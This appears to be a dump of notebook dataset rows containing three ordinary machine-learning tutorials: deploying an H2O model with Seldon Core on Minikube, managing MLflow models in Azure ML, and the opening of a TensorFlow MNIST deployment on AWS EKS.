KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.pom (3 KB at 44.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.0.0.M5/sisu-inject-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.0.0.M5/sisu-inject-0.0.0.M5.pom (14 KB at 184.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.pom (815 B at 15.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.5/plexus-containers-1.5.5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.5/plexus-containers-1.5.5.pom (5 KB at 67.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.7/plexus-2.0.7.pom\n"
],
[
"!docker run --name \"h2o_predictor\" -d --rm -p 5000:5000 h2o-test:0.1",
"43545db7b7f0ee3a6188811d05525d019c5feaaef37779d8e3795205a5664c22\r\n"
]
],
[
[
"Send some random features that conform to the contract",
"_____no_output_____"
]
],
[
[
"!seldon-core-tester contract.json 0.0.0.0 5000 -p",
"----------------------------------------\nSENDING NEW REQUEST:\n\n[[47.799 '2' '2' '1' 2.883]]\nRECEIVED RESPONSE:\ndata {\n ndarray {\n values {\n list_value {\n values {\n number_value: 0.986464936181289\n }\n values {\n number_value: 0.013535063818710993\n }\n }\n }\n }\n}\n\n\n"
],
[
"!docker rm h2o_predictor --force",
"h2o_predictor\r\n"
]
],
[
[
"## Test using Minikube\n\n**Due to a [minikube/s2i issue](https://github.com/SeldonIO/seldon-core/issues/253) you will need [s2i >= 1.1.13](https://github.com/openshift/source-to-image/releases/tag/v1.1.13)**",
"_____no_output_____"
]
],
[
[
"!minikube start --memory 4096 ",
"😄 minikube v0.34.1 on linux (amd64)\n🔥 Creating virtualbox VM (CPUs=2, Memory=4096MB, Disk=20000MB) ...\n📶 \"minikube\" IP address is 192.168.99.100\n🐳 Configuring Docker as the container runtime ...\n✨ Preparing Kubernetes environment ...\n🚜 Pulling images required by Kubernetes v1.13.3 ...\n🚀 Launching Kubernetes v1.13.3 using kubeadm ... \n🔑 Configuring cluster permissions ...\n🤔 Verifying component health .....\n💗 kubectl is now configured to use \"minikube\"\n🏄 Done! Thank you for using minikube!\n"
]
],
[
[
"## Setup Seldon Core\n\nUse the notebook to [Setup Cluster](../../seldon_core_setup.ipynb#Setup-Cluster) with [Ambassador Ingress](../../seldon_core_setup.ipynb#Ambassador) and [Install Seldon Core](../../seldon_core_setup.ipynb#Install-Seldon-Core). Instructions [also online](./seldon_core_setup.html).",
"_____no_output_____"
],
[
"## Build model image and run predictions",
"_____no_output_____"
]
],
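[
[
"If you prefer not to jump to the linked setup notebook, the snippet below is a minimal sketch of an equivalent Helm 3 installation; the `seldon-system` namespace, the public `seldon-charts` repository URL and the `ambassador.enabled` value are assumptions based on Seldon's published charts rather than steps taken from this notebook, so your setup may differ:\n\n```bash\nkubectl create namespace seldon-system\nhelm install seldon-core seldon-core-operator \\\n    --repo https://storage.googleapis.com/seldon-charts \\\n    --namespace seldon-system \\\n    --set ambassador.enabled=true\n```\n\nAmbassador itself (the ingress) is installed separately, as described in the linked setup notebook.",
"_____no_output_____"
]
],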
[
[
"!eval $(minikube docker-env) && s2i build . seldonio/seldon-core-s2i-java-build:0.1 h2o-test:0.1 --runtime-image seldonio/seldon-core-s2i-java-runtime:0.1",
"---> Installing application source...\n[INFO] Scanning for projects...\nDownloading: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-parent/1.5.1.RELEASE/spring-boot-starter-parent-1.5.1.RELEASE.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-parent/1.5.1.RELEASE/spring-boot-starter-parent-1.5.1.RELEASE.pom (8 KB at 20.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-dependencies/1.5.1.RELEASE/spring-boot-dependencies-1.5.1.RELEASE.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-dependencies/1.5.1.RELEASE/spring-boot-dependencies-1.5.1.RELEASE.pom (88 KB at 936.8 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/kr/motd/maven/os-maven-plugin/1.4.1.Final/os-maven-plugin-1.4.1.Final.pom\nDownloaded: https://repo.maven.apache.org/maven2/kr/motd/maven/os-maven-plugin/1.4.1.Final/os-maven-plugin-1.4.1.Final.pom (7 KB at 147.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/9/oss-parent-9.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/9/oss-parent-9.pom (7 KB at 164.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.2.1/maven-plugin-api-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.2.1/maven-plugin-api-3.2.1.pom (4 KB at 82.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.2.1/maven-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.2.1/maven-3.2.1.pom (23 KB at 380.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/23/maven-parent-23.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/23/maven-parent-23.pom (32 KB at 548.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/apache/13/apache-13.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/apache/13/apache-13.pom (14 KB at 45.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.2.1/maven-model-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.2.1/maven-model-3.2.1.pom (5 KB at 49.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.17/plexus-utils-3.0.17.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.17/plexus-utils-3.0.17.pom (4 KB at 72.1 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom (20 KB at 322.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/17/spice-parent-17.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/17/spice-parent-17.pom (7 KB at 165.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/10/forge-parent-10.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/10/forge-parent-10.pom (14 KB at 232.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.2.1/maven-artifact-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.2.1/maven-artifact-3.2.1.pom (2 
KB at 41.8 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.pom (5 KB at 98.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.0.0.M5/sisu-plexus-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.0.0.M5/sisu-plexus-0.0.0.M5.pom (13 KB at 218.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/7/oss-parent-7.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/7/oss-parent-7.pom (5 KB at 112.2 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.pom (2 KB at 36.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-parent/1.0/weld-api-parent-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-parent/1.0/weld-api-parent-1.0.pom (3 KB at 59.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-bom/1.0/weld-api-bom-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-bom/1.0/weld-api-bom-1.0.pom (8 KB at 193.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-parent/6/weld-parent-6.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-parent/6/weld-parent-6.pom (21 KB at 331.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.pom (1023 B at 23.8 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.pom\nDownloaded: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.pom (612 B at 16.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/com/google/guava/guava/10.0.1/guava-10.0.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/com/google/guava/guava/10.0.1/guava-10.0.1.pom (6 KB at 125.2 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/10.0.1/guava-parent-10.0.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/10.0.1/guava-parent-10.0.1.pom (2 KB at 49.1 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/1.3.9/jsr305-1.3.9.pom\nDownloaded: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/1.3.9/jsr305-1.3.9.pom (965 B at 19.2 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0.pom (10 KB at 206.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-parent/3.1.0/guice-parent-3.1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-parent/3.1.0/guice-parent-3.1.0.pom (11 KB at 266.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/aopalliance/aopalliance/1.0/aopalliance-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/aopalliance/aopalliance/1.0/aopalliance-1.0.pom (363 B at 10.1 
KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.pom (3 KB at 66.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.0.0.M5/sisu-inject-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.0.0.M5/sisu-inject-0.0.0.M5.pom (14 KB at 317.8 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.pom (815 B at 20.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.5/plexus-containers-1.5.5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.5/plexus-containers-1.5.5.pom (5 KB at 92.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.7/plexus-2.0.7.pom\n"
],
[
"!kubectl create -f h2o_deployment.json",
"seldondeployment.machinelearning.seldon.io/seldon-deployment-example created\r\n"
]
],
[
[
"Wait until ready (replicas == replicasAvailable)",
"_____no_output_____"
]
],
[
[
"!kubectl rollout status deployment/h2o-deployment-h2o-predictor-1cc70ed",
"deployment \"h2o-deployment-h2o-predictor-1cc70ed\" successfully rolled out\r\n"
],
[
"!seldon-core-api-tester contract.json `minikube ip` `kubectl get svc ambassador -o jsonpath='{.spec.ports[0].nodePort}'` \\\n seldon-deployment-example --namespace seldon -p",
"----------------------------------------\nSENDING NEW REQUEST:\n\n[[66.008 '1' '1' '0' 7.051]]\nRECEIVED RESPONSE:\nmeta {\n puid: \"d36r5qsei3dd62tkrt6g9i75h5\"\n requestPath {\n key: \"prostate-classifier\"\n value: \"h2o-test:0.1\"\n }\n}\ndata {\n ndarray {\n values {\n list_value {\n values {\n number_value: 0.42621511584615\n }\n values {\n number_value: 0.57378488415385\n }\n }\n }\n }\n}\n\n\n"
],
[
"!minikube delete",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb50b4dbb8e754a04f375378e332d1835de78c74 | 16,001 | ipynb | Jupyter Notebook | notebooks/using-mlflow/model-management/model_management.ipynb | jplummer01/azureml-examples | 6a073d157f21060312941f71cfbcf25d0c541183 | [
"MIT"
] | null | null | null | notebooks/using-mlflow/model-management/model_management.ipynb | jplummer01/azureml-examples | 6a073d157f21060312941f71cfbcf25d0c541183 | [
"MIT"
] | null | null | null | notebooks/using-mlflow/model-management/model_management.ipynb | jplummer01/azureml-examples | 6a073d157f21060312941f71cfbcf25d0c541183 | [
"MIT"
] | null | null | null | 27.212585 | 364 | 0.594275 | [
[
[
"# Model management with MLflow\n\nModel management can be done using both MLflow and Azure ML SDK/CLI v2. If you are familiar with MLflow and the capabilities it exposes, we support the entire model lifecycle using the MLFlow client. If you rather use Azure ML specific features or do model management using the CLI, in the same way you can manage the lifecycle using the Azure ML CLI/SDK v2.",
"_____no_output_____"
],
[
"## Support matrix for managing models\n\nThe MLflow client exposes several methods to retrieve and manage models. The following table shows which of those methods are currently supported in MLflow when connected to Azure ML:\n\n| Feature | MLflow | Azure ML with MLflow | Azure ML CLIv2 |\n| :- | :-: | :-: | :-: |\n| Registering models in MLModel models | ☑️ | ☑️ | ☑️ |\n| Registering models not in MLModel format | ☐ | ☐ | ☑️ |\n| Registering models from runs with URIs as `runs/:<ruin-id>/<path>` | ☑️ | ☑️ | ☐ |\n| Registering models from runs with URIs as `azureml://jobs/<job-id>/outputs/artifacts/<path>` | ☐ | ☐ | ☑️* |\n| Listing registered models | ☑️ | ☑️ | ☑️ |\n| Retrieving details of registered model's versions | ☑️ | ☑️ | ☑️ |\n| Editing registered model's versions description | ☑️ | ☑️ | ☑️ |\n| Editing registered model's versions tags | ☑️ | ☑️ | ☑️ |\n| Renaming registered models | ☑️ | ☐** | ☐** |\n| Deleting a registered model (container) | ☑️ | ☐** | ☐** |\n| Deleting a registered model's version | ☑️ | ☑️ | ☑️ |\n| Search registered models by name | ☑️ | ☑️ | ☑️ |\n| Search registered models using string comparators `LIKE` and `ILIKE` | ☑️ | ☐ | ☐ |\n| Search registered models by tag | ☐ | ☐ | ☐ |\n\nNotes:\n* (*) With compatibility issues with Mlflow client\n* (**) Registered models are immutable objects in Azure ML",
"_____no_output_____"
],
[
"## Prerequisites to run this notebook",
"_____no_output_____"
]
],
[
[
"# Ensure you have the dependencies for this notebook\n%pip install -r logging_model_with_mlflow.txt",
"_____no_output_____"
],
[
"import mlflow",
"_____no_output_____"
]
],
[
[
"In the following notebook, we will explore an example that uses the following naming convention:",
"_____no_output_____"
]
],
[
[
"experiment_name = \"heart-classifier\"\nmodel_name = \"heart-classifier\"\nartifact_path = \"classifier\"",
"_____no_output_____"
]
],
[
[
"We need to create a couple of runs and experiments in the workspace to work with. Please run at least one or two training routines:",
"_____no_output_____"
]
],
[
[
"# Install the AML extension and log into Azure\n!az extension add -n ml\n!az login",
"_____no_output_____"
],
[
"# Configure workspace and resource group\n!az config set defaults.workspace=MyWorkspace defaults.group=MyResourceGroup",
"_____no_output_____"
],
[
"# Ensure there is a compute to train on\n!az ml compute create -f ../jobs/trainer-cpu.compute.yml",
"_____no_output_____"
],
[
"# Submit a couple of training jobs to have something to work with\n!az ml job create -f ../jobs/heart-classifier.job.yml",
"_____no_output_____"
]
],
[
[
"## Before starting\n\nIf you are running inside of a Compute Instance in Azure ML, MLflow is already configured to be used. If you are running in you local machine or in a different platform, please configure MLflow to point to the workspace you want to work with by uncommenting the following line and placing your workspace tracking URL.",
"_____no_output_____"
]
],
[
[
"# mlflow.set_tracking_uri = \"<TRACKING_URI>\"",
"_____no_output_____"
]
],
[
[
"> To get the URI, please navigate to Azure ML Studio and select the workspace you are working on > Click on the name of the workspace at the upper right corner of the page > Click “View all properties in Azure Portal” on the pane popup > Copy the MLflow tracking URI value from the properties section.",
"_____no_output_____"
],
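[
"Alternatively, if you have the `azureml-core` package installed and a workspace `config.json` available locally, you can retrieve the tracking URI programmatically; this is only a sketch and both prerequisites are assumptions that are not part of this notebook:\n\n```python\nfrom azureml.core import Workspace\n\nws = Workspace.from_config()  # reads the workspace config.json downloaded from the portal\nmlflow.set_tracking_uri(ws.get_mlflow_tracking_uri())\n```",
"_____no_output_____"
],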
[
"## Creating models from an existing run\n\nIf you have an Mlflow model logged inside of a run and you want to register it in a registry, you can do that by using the experiment and run ID information from the run:",
"_____no_output_____"
]
],
[
[
"exp = mlflow.get_experiment_by_name(experiment_name)\nlast_run = mlflow.search_runs(exp.experiment_id, output_format=\"list\")[-1]\nprint(last_run.info.run_id)",
"_____no_output_____"
]
],
[
[
"Once we have the run identified, we can register the model using Mlflow client:",
"_____no_output_____"
]
],
[
[
"mlflow.register_model(f\"runs:/{last_run.info.run_id}/{artifact_path}\", model_name)",
"_____no_output_____"
]
],
[
[
"## Creating models from assets\n\nIf you have a folder with an MLModel MLflow model, then you can register it directly. There is no need for the model to be always in the context of a run. To do that you can use the URI schema `file://path/to/model` to register it. Let's create a simple model and save it in MLModel format:",
"_____no_output_____"
]
],
[
[
"from sklearn import linear_model\n\nreg = linear_model.LinearRegression()\nreg.fit([[0, 0], [1, 1], [2, 2]], [0, 1, 2])\n\nmlflow.sklearn.save_model(reg, \"./regressor\")",
"_____no_output_____"
]
],
[
[
"Check the files in the folder",
"_____no_output_____"
]
],
[
[
"!ls regressor",
"_____no_output_____"
]
],
[
[
"You can now register the model from the local path:",
"_____no_output_____"
]
],
[
[
"import os\n\nmodel_local_path = os.path.abspath(\"./regressor\")",
"_____no_output_____"
],
[
"mlflow.register_model(f\"file://{model_local_path}\", \"local-model-test\")",
"_____no_output_____"
]
],
[
[
"> Notice how the model URI schema `file:/` requires absolute paths.",
"_____no_output_____"
],
[
"## Querying models",
"_____no_output_____"
],
[
"### Querying all the models in the registry",
"_____no_output_____"
],
[
"You can query all the registered models in the registry using the MLflow client with the method `list_registered_models`.",
"_____no_output_____"
]
],
[
[
"client = mlflow.tracking.MlflowClient()",
"_____no_output_____"
],
[
"for model in client.list_registered_models():\n print(f\"{model.name}\")",
"_____no_output_____"
]
],
[
[
"If you are not sure of the name of the model you are looking for, you can search for it:",
"_____no_output_____"
]
],
[
[
"client.search_registered_models(f\"name='{model_name}'\")",
"_____no_output_____"
]
],
[
[
"### Getting specific versions of the model",
"_____no_output_____"
],
[
"The command above will retrieve the model object which contains all the model versions. However, if you want to get the last registered model version of a given model, you can use `get_registered_model`:",
"_____no_output_____"
]
],
[
[
"client.get_registered_model(model_name)",
"_____no_output_____"
]
],
[
[
"If you need an specific version of the model, you can indicate so:",
"_____no_output_____"
]
],
[
[
"client.get_model_version(model_name, version=2)",
"_____no_output_____"
]
],
[
[
"## Model stages\n\nMLflow supports model's stages to manage model's lifecycle. Stage are assigned to model's version (instead of models). This means that a given model can have multiple versions on different stages.",
"_____no_output_____"
],
[
"### Queying model stages\n\nYou can use the MLflow client to check all the possible stages a model can be:",
"_____no_output_____"
]
],
[
[
"client.get_model_version_stages(model_name, version=\"latest\")",
"_____no_output_____"
]
],
[
[
"You can see what model version is on each stage by getting the model from the registry:",
"_____no_output_____"
]
],
[
[
"client.get_latest_versions(model_name, stages=[\"Staging\"])",
"_____no_output_____"
]
],
[
[
"Notice that multiple versions can be in the same stage at the same time in Mlflow, however, this method returns the latest version (greater version) among all of them.",
"_____no_output_____"
],
[
"> Caution: Notice that stages are case sensitive.",
"_____no_output_____"
],
[
"### Transitioning models\n\nTo transition a model to a particular stage, you can:",
"_____no_output_____"
]
],
[
[
"client.transition_model_version_stage(model_name, version=3, stage=\"Staging\")",
"_____no_output_____"
]
],
[
[
"By default, if there were an existing model version in that particular stage, it will remain there. Hence, it won't be replaced. Alternatively, you can indicate `archive_existing_versions=True` to tell MLflow to move the existing model's version to the stage `Archived`.",
"_____no_output_____"
]
],
[
[
"client.transition_model_version_stage(\n model_name, version=3, stage=\"Staging\", archive_existing_versions=True\n)",
"_____no_output_____"
]
],
[
[
"### Loading models from stages\n\nYou can load a model in a particular stage directly from Python using the `load_model` function and the following `URI` format. Notice that for this method to success, you need to have all the libraries and dependencies already installed in the environment you are working at.",
"_____no_output_____"
]
],
[
[
"model = mlflow.pyfunc.load_model(f\"models:/{model_name}/Staging\")",
"_____no_output_____"
]
],
[
[
"## Editing and deleting models\n\nEditing registered models is supported in both Mlflow and Azure ML, however, there are some differences between them that are important to notice:",
"_____no_output_____"
],
[
"### Editing models\n\nYou can edit model's description and tags from a model using Mlflow:\n\n> Renaming models is not supported in Azure ML as model objects are immmutable.",
"_____no_output_____"
]
],
[
[
"client.update_model_version(\n model_name, version=1, description=\"A heart condition classifier\"\n)",
"_____no_output_____"
]
],
[
[
"To edit tags, you have to use the method `set_model_version_tag` and `remove_model_version_tag`:",
"_____no_output_____"
]
],
[
[
"client.set_model_version_tag(\n model_name, version=\"1\", key=\"type\", value=\"classification\"\n)",
"_____no_output_____"
]
],
[
[
"Removing a tag:",
"_____no_output_____"
]
],
[
[
"client.delete_model_version_tag(model_name, version=\"1\", key=\"type\")",
"_____no_output_____"
]
],
[
[
"### Deleting a model version\n\nYou can delete any model version in the registry using the MLflow client. However, Azure ML doesn't support deleting the entire model container. To achieve the same thing, you will need to delete all the model versions from a given model.",
"_____no_output_____"
]
],
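[
[
"As a sketch of that workaround (reusing the `client` and `model_name` defined above, and assuming model version search is available against your workspace), you can enumerate the versions and delete them one by one:\n\n```python\nfor mv in client.search_model_versions(f\"name='{model_name}'\"):\n    client.delete_model_version(mv.name, version=mv.version)\n```",
"_____no_output_____"
]
],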
[
[
"import mlflow",
"_____no_output_____"
],
[
"client.delete_model_version(model_name, version=\"2\")",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb50b78393efd0fcc90e0f924b757e237e0d0ff5 | 125,443 | ipynb | Jupyter Notebook | examples/models/aws_eks_deep_mnist/aws_eks_deep_mnist.ipynb | pachyderm/seldon-core | 01fc519a7268053b191c745c5ae6bafa0229d5ea | [
"Apache-2.0"
] | 1 | 2021-01-22T02:51:36.000Z | 2021-01-22T02:51:36.000Z | examples/models/aws_eks_deep_mnist/aws_eks_deep_mnist.ipynb | AminuIsrael/seldon-core | 2092ec5471267c3d69697b659376def20c211027 | [
"Apache-2.0"
] | 231 | 2020-08-10T08:38:42.000Z | 2021-08-02T20:56:49.000Z | examples/models/aws_eks_deep_mnist/aws_eks_deep_mnist.ipynb | AminuIsrael/seldon-core | 2092ec5471267c3d69697b659376def20c211027 | [
"Apache-2.0"
] | null | null | null | 35.687909 | 4,684 | 0.435345 | [
[
[
"# AWS Elastic Kubernetes Service (EKS) Deep MNIST\nIn this example we will deploy a tensorflow MNIST model in Amazon Web Services' Elastic Kubernetes Service (EKS).\n\nThis tutorial will break down in the following sections:\n\n1) Train a tensorflow model to predict mnist locally\n\n2) Containerise the tensorflow model with our docker utility\n\n3) Send some data to the docker model to test it\n\n4) Install and configure AWS tools to interact with AWS\n\n5) Use the AWS tools to create and setup EKS cluster with Seldon\n\n6) Push and run docker image through the AWS Container Registry\n\n7) Test our Elastic Kubernetes deployment by sending some data\n\n#### Let's get started! 🚀🔥\n\n## Dependencies:\n\n* Helm v3.0.0+\n* A Kubernetes cluster running v1.13 or above (minkube / docker-for-windows work well if enough RAM)\n* kubectl v1.14+\n* EKS CLI v0.1.32\n* AWS Cli v1.16.163\n* Python 3.6+\n* Python DEV requirements\n",
"_____no_output_____"
],
[
"## 1) Train a tensorflow model to predict mnist locally\nWe will load the mnist images, together with their labels, and then train a tensorflow model to predict the right labels",
"_____no_output_____"
]
],
[
[
"from tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot = True)\nimport tensorflow as tf\n\nif __name__ == '__main__':\n \n x = tf.placeholder(tf.float32, [None,784], name=\"x\")\n\n W = tf.Variable(tf.zeros([784,10]))\n b = tf.Variable(tf.zeros([10]))\n\n y = tf.nn.softmax(tf.matmul(x,W) + b, name=\"y\")\n\n y_ = tf.placeholder(tf.float32, [None, 10])\n\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\n\n train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\n init = tf.initialize_all_variables()\n\n sess = tf.Session()\n sess.run(init)\n\n for i in range(1000):\n batch_xs, batch_ys = mnist.train.next_batch(100)\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\n correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n print(sess.run(accuracy, feed_dict = {x: mnist.test.images, y_:mnist.test.labels}))\n\n saver = tf.train.Saver()\n\n saver.save(sess, \"model/deep_mnist_model\")",
"Extracting MNIST_data/train-images-idx3-ubyte.gz\nExtracting MNIST_data/train-labels-idx1-ubyte.gz\nExtracting MNIST_data/t10k-images-idx3-ubyte.gz\nExtracting MNIST_data/t10k-labels-idx1-ubyte.gz\n0.9194\n"
]
],
[
[
"## 2) Containerise the tensorflow model with our docker utility",
"_____no_output_____"
],
[
"First you need to make sure that you have added the .s2i/environment configuration file in this folder with the following content:",
"_____no_output_____"
]
],
[
[
"!cat .s2i/environment",
"MODEL_NAME=DeepMnist\r\nAPI_TYPE=REST\r\nSERVICE_TYPE=MODEL\r\nPERSISTENCE=0\r\n"
]
],
[
[
"Now we can build a docker image named \"deep-mnist\" with the tag 0.1",
"_____no_output_____"
]
],
[
[
"!s2i build . seldonio/seldon-core-s2i-python36:1.3.0-dev deep-mnist:0.1",
